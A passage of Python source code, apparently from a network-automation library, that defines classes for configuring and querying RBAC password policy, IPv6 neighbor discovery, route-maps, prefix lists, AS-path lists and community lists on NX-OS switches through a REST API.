self.pwd_max_len = None
self.pwd_min_len = None
self.pwd_secure_mode = None
self.pwd_strength_check = 'yes'
self.roles = []
self.users = []
def set_pwd_max_length(self, max_len):
self.pwd_max_len = max_len
def set_pwd_min_length(self, min_len):
self.pwd_min_len = min_len
def enable_pwd_strength_check(self):
self.pwd_strength_check = 'yes'
def disable_pwd_strength_check(self):
self.pwd_strength_check = 'no'
def enable_pwd_secure_mode(self):
self.pwd_secure_mode = 'yes'
def disable_pwd_secure_mode(self):
self.pwd_secure_mode = 'no'
def create_role(self, name):
role = AaaRole(name)
self._children.append(role)
self.roles.append(role)
def add(self, obj):
self._children.append(obj)
if isinstance(obj, AaaUser):
self.users.append(obj)
def _get_attributes(self):
att = {}
if self.pwd_max_len:
att['pwdMaxLength'] = self.pwd_max_len
if self.pwd_min_len:
att['pwdMinLength'] = self.pwd_min_len
if self.pwd_secure_mode:
att['pwdSecureMode'] = self.pwd_secure_mode
if self.pwd_strength_check:
att['pwdStrengthCheck'] = self.pwd_strength_check
return att
def get_url(self):
""" Return RBAC url """
return '/api/node/mo/sys/userext.json'
def get_json(self):
return super(RBAC, self).get_json(obj_class=self.rbac_obj,
attributes=self._get_attributes())
@classmethod
def get(cls, session, role_name=None):
"""
:param session: Session object to communicate with Switch
:return RBAC object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
rbac_obj = 'aaaUserEp'
rbac = RBAC()
if role_name:
query_url = ('/api/node/mo/sys/userext/role-' + role_name +
'.json?rsp-subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
rbac.create_role(str(ret['aaaRole']['attributes']['name']))
else:
query_url = '/api/node/mo/sys/userext.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
for ret in resp:
rbac_att = ret[rbac_obj]['attributes']
rbac.set_pwd_max_length(str(rbac_att['pwdMaxLength']))
rbac.set_pwd_min_length(str(rbac_att['pwdMinLength']))
if rbac_att['pwdSecureMode'] == 'yes':
rbac.enable_pwd_secure_mode()
else:
rbac.disable_pwd_secure_mode
if rbac_att['pwdStrengthCheck'] == 'yes':
rbac.enable_pwd_strength_check()
else:
rbac.disable_pwd_strength_check()
if ret[rbac_obj].get('children'):
for child in ret[rbac_obj]['children']:
if child.get('aaaRole'):
rbac.create_role(str(child['aaaRole']
['attributes']['name']))
if child.get('aaaUser'):
user_att = child['aaaUser']['attributes']
user = AaaUser(str(user_att['name']))
children = child['aaaUser']['children']
for g_child in children:
if g_child.get('aaaUserDomain'):
for roles in g_child['aaaUserDomain'][
'children']:
user.set_role(str(roles['aaaUserRole']
['attributes']['name']))
if g_child.get('aaaSshAuth'):
user.set_ssh_key(str(g_child['aaaSshAuth']
['attributes']['data']))
rbac.add(user)
return rbac
class NdPrefix(BaseNXObject):
"""
This class defines neighbor discovery prefix configuration
"""
def __init__(self, int, address, lifetime=None, pref_lifetime=None,
session=None, parent=None):
super(NdPrefix, self).__init__(name="")
self.prefix_obj = 'ndPfx'
self.address = address
self.int = int
self.lifetime = lifetime
self.pref_lifetime = pref_lifetime
def _get_attributes(self):
att = {}
att['addr'] = self.address
if self.lifetime and self.pref_lifetime:
att['lifetime'] = self.lifetime
att['prefLifetime'] = self.pref_lifetime
return att
def get_url(self):
""" Return Neighbor Discovery interface prefix url """
return ('/api/node/mo/sys/nd/inst/dom-default/if-[' + self.int +
']/pfx-[' + self.address + '].json')
def get_json(self):
return super(NdPrefix, self).get_json(obj_class=self.prefix_obj,
attributes=self._get_attributes())
class NdInterface(BaseNXObject):
"""
This class defines neighbor discovery interface configuration
"""
def __init__(self, id, session=None, parent=None):
super(NdInterface, self).__init__(name="")
self._session= session
self._parent = parent
self.nd_int_obj = 'ndIf'
self.id = id
self.redirect_st = None
self.ra_interval = None
self.prefixes = []
def set_ra_interval(self, interval):
self.ra_interval = interval
def enable_redirect(self):
self.redirect_st = 'redirects'
def disable_redirect(self):
self.redirect_st = '-'
def set_prefix(self, address, lifetime=None, pref_lifetime=None):
if lifetime and not pref_lifetime:
raise TypeError("Provide both lifetime and preferred lifetime")
elif lifetime and (int(lifetime) < int(pref_lifetime)):
print lifetime, pref_lifetime
raise TypeError("lifetime must be greater than or equal to "
+ "preferred lifetime")
prefix = NdPrefix(self.id, address, lifetime, pref_lifetime)
self._children.append(prefix)
self.prefixes.append(prefix)
def _get_attributes(self):
att = {}
att['id'] = self.id
if self.redirect_st == '-':
self.redirect_st = ''
if self.redirect_st in ['', 'redirects']:
att['ctrl'] = self.redirect_st
if self.ra_interval:
att['raIntvl'] = self.ra_interval
return att
def get_url(self):
""" Return Neighbor Discovery Interface url """
return ('/api/node/mo/sys/nd/inst/dom-default/if-[' + self.id +
'].json')
def get_json(self):
return super(NdInterface, self).get_json(obj_class=self.nd_int_obj,
attributes=self._get_attributes())
def _get_int_details(self, nd_iface, resp):
nd_int_obj = 'ndIf'
int_att = resp[nd_int_obj]['attributes']
nd_iface.set_ra_interval(str(int_att['raIntvl']))
if str(int_att['ctrl']) == 'redirects':
nd_iface.enable_redirect()
else:
nd_iface.disable_redirect()
nd_iface.set_ra_interval(str(int_att['raIntvl']))
if resp[nd_int_obj].get('children'):
for child in resp[nd_int_obj]['children']:
pre_att = child['ndPfx']['attributes']
nd_iface.set_prefix(str(pre_att['addr']),
str(pre_att['lifetime']),
str(pre_att['prefLifetime']))
@classmethod
def get(cls, session, interface):
"""
:param session: Session object to communicate with Switch
:return ND Interface object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
nd_int_obj = 'ndIf'
query_url = ('/api/node/mo/sys/nd/inst/dom-default/if-[' + interface
+ '].json?rsp-subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
int_att = ret[nd_int_obj]['attributes']
nd_iface = NdInterface(str(int_att['id']))
nd_iface._get_int_details(nd_iface, ret)
return nd_iface
class ND(BaseNXObject):
"""
This class defines neighbor discovery configuration
"""
def __init__(self, session=None, parent=None):
super(ND, self).__init__(name="")
self._session= session
self._parent = parent
self.nd_obj = 'ndDom'
self.interfaces = []
def add(self, int_obj):
self._children.append(int_obj)
self.interfaces.append(int_obj)
def get_url(self):
""" Return Neighbor Discovery url """
return '/api/node/mo/sys/nd/inst/dom-default.json'
def get_json(self):
return super(ND, self).get_json(obj_class=self.nd_obj,
attributes={})
@classmethod
def get(cls, session):
"""
:param session: Session object to communicate with Switch
:return ND object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
nd_obj = 'ndDom'
nd_int_obj = 'ndIf'
nd = ND()
query_url = ('/api/node/mo/sys/nd/inst/dom-default.json?rsp-' +
'subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
nd_int = ret[nd_obj]['children']
for child in nd_int:
int_att = child[nd_int_obj]['attributes']
nd_iface = NdInterface(str(int_att['id']))
nd_iface._get_int_details(nd_iface, child)
nd.add(nd_iface)
return nd
class MatchRtType(BaseNXObject):
"""
This class defines match route type configuration
"""
def __init__(self, name, seq_no, type, session=None, parent=None):
super(MatchRtType, self).__init__(name)
self._session= session
self._parent = parent
self.rt_type_obj = 'rtmapMatchRtType'
self.name = name
self.seq_no = seq_no
self.type = type
def _get_attributes(self):
att = {}
att['routeT'] = self.type
return att
def get_url(self):
""" Return match route type url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrttype-' + self.type + '.json')
def get_json(self):
return super(MatchRtType, self).get_json(obj_class=self.rt_type_obj,
attributes=self._get_attributes())
class MatchRtTag(BaseNXObject):
"""
This class defines match route tag configuration
"""
def __init__(self, name, seq_no, tag, session=None, parent=None):
super(MatchRtTag, self).__init__(name)
self._session= session
self._parent = parent
self.rt_tag_obj = 'rtmapMatchRtTag'
self.name = name
self.seq_no = seq_no
self.tag = tag
def _get_attributes(self):
att = {}
att['tag'] = self.tag
return att
def get_url(self):
""" Return match route tag url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrttag-' + self.tag + '.json')
def get_json(self):
return super(MatchRtTag, self).get_json(obj_class=self.rt_tag_obj,
attributes=self._get_attributes())
class SetPeerAddr(BaseNXObject):
"""
This class defines set peer address configuration
"""
def __init__(self, name, seq_no, version='v4', state='disabled',
session=None, parent=None):
super(SetPeerAddr, self).__init__(name)
self._session= session
self._parent = parent
self.peer_obj = 'rtmapSetNhPeerAddr'
self.name = name
self.seq_no = seq_no
self.version = version
self.state = state
def _get_attributes(self):
att = {}
if self.version == 'v4':
att['v4PeerAddr'] = self.state
if self.version == 'v6':
att['v6PeerAddr'] = self.state
return att
def get_url(self):
""" Return set peer address url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/nhpa.json')
def get_json(self):
return super(SetPeerAddr, self).get_json(obj_class=self.peer_obj,
attributes=self._get_attributes())
class SetNextHop(BaseNXObject):
"""
This class defines set next hop address configuration
"""
def __init__(self, name, seq_no, addr, session=None, parent=None):
super(SetNextHop, self).__init__(name)
self._session= session
self._parent = parent
self.nh_obj = 'rtmapSetNh'
self.name = name
self.seq_no = seq_no
self.addr = addr
def _get_attributes(self):
att = {}
att['addr'] = self.addr
return att
def get_url(self):
""" Return set next hop address url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/nh-[' + self.addr + '].json')
def get_json(self):
return super(SetNextHop, self).get_json(obj_class=self.nh_obj,
attributes=self._get_attributes())
class SetLocalPref(BaseNXObject):
"""
This class defines set local preference configuration
"""
def __init__(self, name, seq_no, local_pref, session=None, parent=None):
super(SetLocalPref, self).__init__(name)
self._session= session
self._parent = parent
self.pref_obj = 'rtmapSetPref'
self.name = name
self.seq_no = seq_no
self.local_pref = local_pref
def _get_attributes(self):
att = {}
att['localPref'] = self.local_pref
return att
def get_url(self):
""" Return set local preference url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/spref.json')
def get_json(self):
return super(SetLocalPref, self).get_json(obj_class=self.pref_obj,
attributes=self._get_attributes())
class SetOrigin(BaseNXObject):
"""
This class defines set origin configuration
"""
def __init__(self, name, seq_no, origin, session=None, parent=None):
super(SetOrigin, self).__init__(name)
self._session= session
self._parent = parent
self.origin_obj = 'rtmapSetOrigin'
self.name = name
self.seq_no = seq_no
self.origin = origin
def _get_attributes(self):
att = {}
att['originT'] = self.origin
return att
def get_url(self):
""" Return set origin url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/origin.json')
def get_json(self):
return super(SetOrigin, self).get_json(obj_class=self.origin_obj,
attributes=self._get_attributes())
class SetCommList(BaseNXObject):
"""
This class defines set community-list configuration
"""
def __init__(self, name, seq_no, comm_name, delete=None, session=None,
parent=None):
super(SetCommList, self).__init__(name)
self._session= session
self._parent = parent
self.comm_obj = 'rtmapSetCommList'
self.name = name
self.seq_no = seq_no
self.comm_name = comm_name
if delete:
self.delete = 'enabled'
def _get_attributes(self):
att = {}
att['name'] = self.comm_name
if self.delete:
att['delete'] = self.delete
else:
att['delete'] = 'disabled'
return att
def get_url(self):
""" Return set community-list url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/scommlist.json')
def get_json(self):
return super(SetCommList, self).get_json(obj_class=self.comm_obj,
attributes=self._get_attributes())
class RtmapRs(BaseNXObject):
"""
This class defines Route-map Match name configuration
"""
def __init__(self, name, seq_no, rs_obj, rs_name, session=None,
parent=None):
super(RtmapRs, self).__init__(name=rs_name)
self._session= session
self._parent = parent
self.name = name
self.seq_no = seq_no
self.rs_obj = rs_obj
self.rs_name = rs_name
def _get_attributes(self):
att = {}
if self.rs_obj == 'rtmapRsRtAsPathAccAtt':
att['tDn'] = 'sys/rpm/accesslist-' + self.rs_name
elif self.rs_obj == 'rtmapRsRtDstAtt':
att['tDn'] = 'sys/rpm/pfxlistv4-' + self.rs_name
elif self.rs_obj == 'rtmapRsRtDstV6Att':
att['tDn'] = 'sys/rpm/pfxlistv6-' + self.rs_name
elif self.rs_obj == 'rtmapRsRegCommAtt':
att['tDn'] = 'sys/rpm/rtregcom-' + self.rs_name
return att
def get_url(self):
""" Return Route-map Match name url """
if self.rs_obj == 'rtmapRsRtAsPathAccAtt':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrtacclist/rsrtAsPathAccAtt-[sys/rpm/' +
'accesslist-' + self.rs_name + '].json')
elif self.rs_obj == 'rtmapRsRtDstAtt':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrtdst/rsrtDstAtt-[sys/rpm/pfxlistv4-' +
self.rs_name + '].json')
elif self.rs_obj == 'rtmapRsRtDstV6Att':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrtdstv6/rsrtDstV6Att-[sys/rpm/pfxlistv6-'
+ self.rs_name + '].json')
elif self.rs_obj == 'rtmapRsRegCommAtt':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mregcomm/rsregCommAtt-[sys/rpm/rtregcom-'
+ self.rs_name + '].json')
def get_json(self):
return super(RtmapRs, self).get_json(obj_class=self.rs_obj,
attributes=self._get_attributes())
class RtmapMatch(BaseNXObject):
"""
This class defines Route-map Match configuration
"""
def __init__(self, name, seq_no, match_obj, match_name,
match_criteria=None, session=None, parent=None):
super(RtmapMatch, self).__init__(name)
self._session= session
self._parent = parent
self.name = name
self.seq_no = seq_no
self.match_obj = match_obj
self.criteria = match_criteria
if self.match_obj == 'rtmapMatchAsPathAccessList':
self.child_obj = 'rtmapRsRtAsPathAccAtt'
elif self.match_obj == 'rtmapMatchRtDst':
self.child_obj = 'rtmapRsRtDstAtt'
elif self.match_obj == 'rtmapMatchRtDstV6':
self.child_obj = 'rtmapRsRtDstV6Att'
elif self.match_obj == 'rtmapMatchRegComm':
self.child_obj = 'rtmapRsRegCommAtt'
else:
raise TypeError("Provide proper object name")
self.matches = []
self.add(self.child_obj, match_name)
def add(self, match_child_obj, match_name):
rtmaprs = RtmapRs(self.name, self.seq_no, match_child_obj, match_name)
self._children.append(rtmaprs)
self.matches.append(rtmaprs)
def _get_attributes(self):
att = {}
if self.criteria:
att['criteria'] = self.criteria
return att
def get_url(self):
""" Return Route-map Match url """
if self.match_obj == 'rtmapMatchAsPathAccessList':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrtacclist.json')
elif self.match_obj == 'rtmapMatchRtDst':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrtdst.json')
elif self.match_obj == 'rtmapMatchRtDstV6':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mrtdstv6.json')
elif self.match_obj == 'rtmapMatchRegComm':
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/mregcomm.json')
def get_json(self):
return super(RtmapMatch, self).get_json(obj_class=self.match_obj,
attributes=self._get_attributes())
class RegCom(BaseNXObject):
"""
This class defines community configuration
"""
def __init__(self, name, seq_no, community, session=None, parent=None):
super(RegCom, self).__init__(name)
self._session= session
self._parent = parent
self.comm_obj = 'rtregcomItem'
self.name = name
self.seq_no = seq_no
if community == 'internet':
self.community = '0:0'
elif community == 'local-AS':
self.community = '65535:65283'
elif community == 'no-advertise':
self.community = '65535:65282'
elif community == 'no-export':
self.community = '65535:65281'
else:
self.community = community
def _get_attributes(self):
att = {}
att['community'] = 'regular:as2-nn2:' + self.community
return att
def get_url(self):
""" Return set community url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/sregcomm/item-regular:as2-nn2:' +
self.community +'.json')
def get_json(self):
return super(RegCom, self).get_json(obj_class=self.comm_obj,
attributes=self._get_attributes())
class SetRegCom(BaseNXObject):
"""
This class defines set community configuration
"""
def __init__(self, name, seq_no, community, session=None, parent=None):
super(SetRegCom, self).__init__(name)
self._session= session
self._parent = parent
self.comm_obj = 'rtmapSetRegComm'
self.name = name
self.seq_no = seq_no
community = community.split(',')
if 'additive' in community:
self.additive = 'enabled'
community.remove('additive')
else:
self.additive = None
self.communities = []
self.add_comm_item(community)
def add_comm_item(self, community):
for comm in community:
reg_comm = RegCom(self.name, self.seq_no, comm)
self._children.append(reg_comm)
self.communities.append(reg_comm)
def _get_attributes(self):
att = {}
if self.additive:
att['additive'] = self.additive
else:
att['additive'] = 'disabled'
return att
def get_url(self):
""" Return set community url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/sregcomm.json')
def get_json(self):
return super(SetRegCom, self).get_json(obj_class=self.comm_obj,
attributes=self._get_attributes())
class RouteMapEntry(BaseNXObject):
"""
This class defines Route-map entry configuration
"""
def __init__(self, action='permit', seq_no='10', session=None,
parent=None):
super(RouteMapEntry, self).__init__(name='')
self._session= session
self._parent = parent
self.rtmap_entry_obj = 'rtmapEntry'
self.action = action
self.seq_no = seq_no
self.descr = None
self.comm_list = []
self.v6_prefix_list = []
self.v4_prefix_list = []
self.as_paths = []
self.community = []
self.next_hops = []
self.rt_types = []
self.rt_tags = []
self.local_preferences = []
self.origin = []
def set_descr(self, descr):
self.descr = descr
def _get_attributes(self):
att = {}
att['action'] = self.action
att['order'] = self.seq_no
if self.descr:
att['descr'] = self.descr
return att
def match_rt_type(self, type):
match_type = MatchRtType(self.name, self.seq_no, type)
self._children.append(match_type)
self.rt_types.append(match_type)
def match_rt_tag(self, tag):
match_tag = MatchRtTag(self.name, self.seq_no, tag)
self._children.append(match_tag)
self.rt_tags.append(match_tag)
def enable_nh_peer(self, version):
nh_peer = SetPeerAddr(self.name, self.seq_no, version,
state='enabled')
self._children.append(nh_peer)
def disable_nh_peer(self, version):
nh_peer = SetPeerAddr(self.name, self.seq_no, version,
state='disabled')
self._children.append(nh_peer)
def set_next_hop(self, addr):
nxt_hop_addr = SetNextHop(self.name, self.seq_no, addr)
self._children.append(nxt_hop_addr)
self.next_hops.append(nxt_hop_addr)
def set_local_pref(self, local_pref):
local_pref = SetLocalPref(self.name, self.seq_no, local_pref)
self._children.append(local_pref)
self.local_preferences.append(local_pref)
def set_origin(self, origin):
origin = SetOrigin(self.name, self.seq_no, origin)
self._children.append(origin)
self.origin.append(origin)
def set_comm_list(self, name, delete):
comm_list = SetCommList(self.name, self.seq_no, name, delete)
self._children.append(comm_list)
self.comm_list.append(comm_list)
def match_as_path(self, name):
as_path_obj = 'rtmapMatchAsPathAccessList'
match_obj = RtmapMatch(self.name, self.seq_no, as_path_obj, name)
self._children.append(match_obj)
self.as_paths.append(match_obj)
def match_pfxlistv4(self, name):
pfx_v4_obj = 'rtmapMatchRtDst'
match_obj = RtmapMatch(self.name, self.seq_no, pfx_v4_obj, name)
self._children.append(match_obj)
self.v4_prefix_list.append(match_obj)
def match_pfxlistv6(self, name):
pfx_v6_obj = 'rtmapMatchRtDstV6'
match_obj = RtmapMatch(self.name, self.seq_no, pfx_v6_obj, name)
self._children.append(match_obj)
self.v6_prefix_list.append(match_obj)
def match_comm(self, name, criteria='sub-group'):
match_comm_obj = 'rtmapMatchRegComm'
match_obj = RtmapMatch(self.name, self.seq_no, match_comm_obj, name,
criteria)
self._children.append(match_obj)
self.community.append(match_obj)
def set_comm(self, community):
set_comm = SetRegCom(self.name, self.seq_no, community)
self._children.append(set_comm)
def get_url(self):
""" Return Route-map entry url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '.json')
def get_json(self):
return super(RouteMapEntry, self).get_json(
obj_class=self.rtmap_entry_obj,
attributes=self._get_attributes())
class RouteMap(BaseNXObject):
"""
This class defines Route-map configuration
"""
def __init__(self, name, session=None, parent=None):
super(RouteMap, self).__init__(name)
self._session= session
self._parent = parent
self.rtmap_obj = 'rtmapRule'
self.name = name
self.rt_map_entries = []
def add(self, rt_obj):
self._children.append(rt_obj)
self.rt_map_entries.append(rt_obj)
def _get_attributes(self):
att = {}
att['name'] = self.name
return att
def get_url(self):
""" Return Route-map url """
return '/api/node/mo/sys/rpm/rtmap-' + self.name + '.json'
def get_json(self):
return super(RouteMap, self).get_json(obj_class=self.rtmap_obj,
attributes=self._get_attributes())
@classmethod
def get(cls, session, name):
"""
:param session: Session object to communicate with Switch
:return Route-map object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
rt_map_obj = 'rtmapRule'
query_url = ('/api/node/mo/sys/rpm/rtmap-' + name + '.json?rsp-'
+ 'subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
rt_map = RouteMap(str(ret[rt_map_obj]['attributes']['name']))
if ret[rt_map_obj].get('children'):
for child in ret[rt_map_obj]['children']:
map_att = child['rtmapEntry']['attributes']
map = RouteMapEntry(str(map_att['action']),
str(map_att['order']))
map.set_descr(str(map_att['descr']))
if child['rtmapEntry'].get('children'):
for g_child in child['rtmapEntry']['children']:
if g_child.get('rtmapMatchRtDstV6'):
att=g_child['rtmapMatchRtDstV6']['children']
for gg_child in att:
name=gg_child['rtmapRsRtDstV6Att'][
'attributes']
map.match_pfxlistv6(str(name['tDn'][18:]))
elif g_child.get('rtmapMatchRtDst'):
att=g_child['rtmapMatchRtDst']['children']
for gg_child in att:
name=gg_child['rtmapRsRtDstAtt'][
'attributes']
map.match_pfxlistv4(str(name['tDn'][18:]))
elif g_child.get('rtmapMatchRegComm'):
att=g_child['rtmapMatchRegComm']['children']
for gg_child in att:
name=gg_child['rtmapRsRegCommAtt'][
'attributes']
map.match_comm(str(name['tDn'][17:]))
elif g_child.get('rtmapMatchAsPathAccessList'):
g_child['rtmapMatchAsPathAccessList'][
'attributes']
att=g_child['rtmapMatchAsPathAccessList'][
'children']
for gg_child in att:
name=gg_child['rtmapRsRtAsPathAccAtt'][
'attributes']
map.match_as_path(str(name['tDn'][19:]))
elif g_child.get('rtmapSetNh'):
att=g_child['rtmapSetNh']['attributes']
map.set_next_hop(str(att['addr']))
elif g_child.get('rtmapSetCommList'):
att=g_child['rtmapSetCommList']['attributes']
map.set_comm_list(str(att['name']), 'delete')
elif g_child.get('rtmapMatchRtType'):
att=g_child['rtmapMatchRtType']['attributes']
map.match_rt_type(str(att['routeT']))
elif g_child.get('rtmapMatchRtTag'):
att=g_child['rtmapMatchRtTag']['attributes']
map.match_rt_tag(str(att['tag']))
elif g_child.get('rtmapSetPref'):
att=g_child['rtmapSetPref']['attributes']
map.set_local_pref(str(att['localPref']))
elif g_child.get('rtmapSetOrigin'):
att=g_child['rtmapSetOrigin']['attributes']
map.set_origin(str(att['originT']))
rt_map.add(map)
return rt_map
class RtPrefix(BaseNXObject):
"""
This class defines Prefix address configuration
"""
def __init__(self, address, action='permit', seq_no='5', session=None,
parent=None):
super(RtPrefix, self).__init__(name='')
self._session= session
self._parent = parent
self.pfx_obj = 'rtpfxEntry'
self.pfx_addr = address
self.action = action
self.seq_no = seq_no
def _get_attributes(self):
att = {}
att['action'] = self.action
att['pfx'] = self.pfx_addr
att['order'] = self.seq_no
return att
def get_url(self):
""" Return Prefix address url """
return '/api/node/mo/'+ self.pfx_addr + '.json'
def get_json(self):
return super(RtPrefix, self).get_json(obj_class=self.pfx_obj,
attributes=self._get_attributes())
class PrefixList(BaseNXObject):
"""
This class defines Prefix list configuration
"""
def __init__(self, name, version='v4', session=None, parent=None):
super(PrefixList, self).__init__(name)
self._session= session
self._parent = parent
if version == 'v4':
self.pfx_list_obj = 'rtpfxRuleV4'
elif version == 'v6':
self.pfx_list_obj = 'rtpfxRuleV6'
else:
raise TypeError("Provide proper version")
self.name = name
self.prefix_list = []
def set_prefix(self, pfx_addr, action=None, seq_no=None):
pfx = RtPrefix(pfx_addr, action, seq_no)
self._children.append(pfx)
self.prefix_list.append(pfx)
def _get_attributes(self):
att = {}
att['name'] = self.name
return att
def get_url(self):
""" Return Prefix list url """
if self.pfx_list_obj == 'rtpfxRuleV6':
return '/api/node/mo/sys/rpm/pfxlistv6-' + self.name + '.json'
else:
return '/api/node/mo/sys/rpm/pfxlistv4-' + self.name + '.json'
def get_json(self):
return super(PrefixList, self).get_json(obj_class=self.pfx_list_obj,
attributes=self._get_attributes())
@classmethod
def get(cls, session, name, version='v4'):
"""
:param session: Session object to communicate with Switch
:return PrefixList object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
if version == 'v4':
prefix_obj = 'rtpfxRuleV4'
query_url = ('/api/node/mo/sys/rpm/pfxlistv4-' + name +
'.json?rsp-' + 'subtree=full')
elif version == 'v6':
prefix_obj = 'rtpfxRuleV6'
query_url = ('/api/node/mo/sys/rpm/pfxlistv6-' + name +
'.json?rsp-' + 'subtree=full')
else:
raise TypeError('Provide proper Verion')
resp = session.get(query_url).json()['imdata']
for ret in resp:
prefix = PrefixList((str(ret[prefix_obj]['attributes']
['name'])), version)
if ret[prefix_obj].get('children'):
for child in ret[prefix_obj]['children']:
pfx_att = child['rtpfxEntry']['attributes']
prefix.set_prefix(str(pfx_att['pfx']),
str(pfx_att['action']),
str(pfx_att['order']))
return prefix
class AccessList(BaseNXObject):
"""
This class defines access list configuration
"""
def __init__(self, name, action, regex, seq_no=None, session=None,
parent=None):
super(AccessList, self).__init__(name)
self._session= session
self._parent = parent
self.acc_list_obj = 'rtlistEntry'
self.name = name
self.action = action
self.regex = regex
self.seq_no = seq_no
def _get_attributes(self):
att = {}
att['action'] = self.action
att['regex'] = self.regex
if self.seq_no:
att['order'] = self.seq_no
else:
att['order'] = '1'
return att
def get_url(self):
""" Return access list url """
return ('/api/node/mo/sys/rpm/accesslist-'+ self.name + '/ent-' +
self.seq_no + '.json')
def get_json(self):
return super(AccessList, self).get_json(obj_class=self.acc_list_obj,
attributes=self._get_attributes())
class AsPath(BaseNXObject):
"""
This class defines As Path configuration
"""
def __init__(self, name, session=None, parent=None):
super(AsPath, self).__init__(name)
self._session= session
self._parent = parent
self.as_path_obj = 'rtlistRule'
self.name = name
self.access_lists = []
def set_access_list(self, action, regex, seq_no=None):
access = AccessList(self.name, action, regex, seq_no)
self._children.append(access)
self.access_lists.append(access)
def _get_attributes(self):
att = {}
att['name'] = self.name
return att
def get_url(self):
""" Return As Path url """
return '/api/node/mo/sys/rpm/accesslist-' + self.name + '.json'
def get_json(self):
return super(AsPath, self).get_json(obj_class=self.as_path_obj,
attributes=self._get_attributes())
@classmethod
def get(cls, session, name):
"""
:param session: Session object to communicate with Switch
:return As path object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
as_path_obj = 'rtlistRule'
query_url = ('/api/node/mo/sys/rpm/accesslist-' + name + '.json?rsp-'
+ 'subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
as_path = AsPath(str(ret[as_path_obj]['attributes']['name']))
if ret[as_path_obj].get('children'):
for child in ret[as_path_obj]['children']:
list_att = child['rtlistEntry']['attributes']
as_path.set_access_list((str(list_att['action'])),
(str(list_att['regex'])),
(str(list_att['order'])))
return as_path
class CommunityItem(BaseNXObject):
"""
This class defines community item configuration
"""
def __init__(self, community, session=None, parent=None):
super(CommunityItem, self).__init__(name='')
self._session= session
self._parent = parent
self.comm_obj = 'rtregcomItem'
if community == 'internet':
self.community = '0:0'
elif community == 'local-AS':
self.community = '65535:65283'
elif community == 'no-advertise':
self.community = '65535:65282'
elif community == 'no-export':
self.community = '65535:65281'
else:
self.community = community
def _get_attributes(self):
att = {}
att['community'] = 'regular:as2-nn2:' + self.community
return att
def get_url(self):
""" Return set community url """
return ('/api/node/mo/sys/rpm/rtmap-' + self.name + '/ent-' +
self.seq_no + '/sregcomm/item-regular:as2-nn2:' +
self.community +'.json')
def get_json(self):
return super(CommunityItem, self).get_json(obj_class=self.comm_obj,
attributes=self._get_attributes())
class CommunityEntry(BaseNXObject):
"""
This class defines community-entry configuration
"""
def __init__(self, action, community, seq_no='1', session=None,
parent=None):
super(CommunityEntry, self).__init__(name='')
self._session= session
self._parent = parent
self.comm_obj = 'rtregcomEntry'
self.action = action
self.seq_no = seq_no
self.comm_items = []
community = community.split(',')
self.add(community)
def add(self, community):
for comm in community:
com_item = CommunityItem(comm)
self._children.append(com_item)
self.comm_items.append(com_item)
def _get_attributes(self):
att = {}
att['action'] = self.action
att['order'] = self.seq_no
return att
def get_url(self):
""" Return community-entry url """
return ('/api/node/mo/sys/rpm/rtregcom-' + self.name + '.json')
def get_json(self):
return super(CommunityEntry, self).get_json(obj_class=self.comm_obj,
attributes=self._get_attributes())
class CommunityList(BaseNXObject):
"""
This class defines community-list configuration
"""
def __init__(self, name, mode, session=None, parent=None):
super(CommunityList, self).__init__(name)
self._session= session
self._parent = parent
self.comm_obj = 'rtregcomRule'
self.name = name
self.mode = mode
self.comm_entries = []
def add(self, comm_entry_obj):
self._children.append(comm_entry_obj)
self.comm_entries.append(comm_entry_obj)
def _get_attributes(self):
att = {}
att['name'] = self.name
att['mode'] = self.mode
return att
def get_url(self):
""" Return community-list url """
return ('/api/node/mo/sys/rpm/rtregcom-' + self.name + '.json')
def get_json(self):
return super(CommunityList, self).get_json(obj_class=self.comm_obj,
attributes=self._get_attributes())
@classmethod
def get(cls, session, name):
"""
:param session: Session object to communicate with Switch
:return As path object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
comm_obj = 'rtregcomRule'
query_url = ('/api/node/mo/sys/rpm/rtregcom-' + name + '.json?rsp-'
+ 'subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
com_list = CommunityList(str(ret[comm_obj]['attributes']['name']),
str(ret[comm_obj]['attributes']['mode']))
if ret[comm_obj].get('children'):
for child in ret[comm_obj]['children']:
